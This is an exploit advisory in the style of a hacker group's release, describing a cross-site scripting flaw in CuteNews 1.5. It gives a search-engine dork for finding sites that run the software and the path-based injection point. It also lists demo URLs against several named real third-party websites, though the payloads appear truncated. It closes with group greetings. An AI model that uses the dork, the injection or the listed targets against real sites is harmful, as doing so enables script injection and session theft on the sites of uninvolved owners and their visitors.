# Exploit Title: Cutenews 1.5 Cross site Scripting Vulnerability # # Google Dork: Intext:"Content Management Powered by CuteNews" # # Date: 09/04/2012 # # Author: Crim3R & Ajax Security Team # # Site : Http://AjaxTm.com/ # # Vendor Home OR download link: http://cutephp.com/click.php?cutenews_latest # # Tested on: all # ================================== [+] exploit : Cutenews/index.php/[htmlcode]/ D3m0: http://www.jamieinsider.com/news-site.php/">// http://www.jamieinsider.com/index.php/">// http://www.alicepasquini.com/index.php/">// http://www.wannagoout.net/index.php/">//galleries/index.php ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369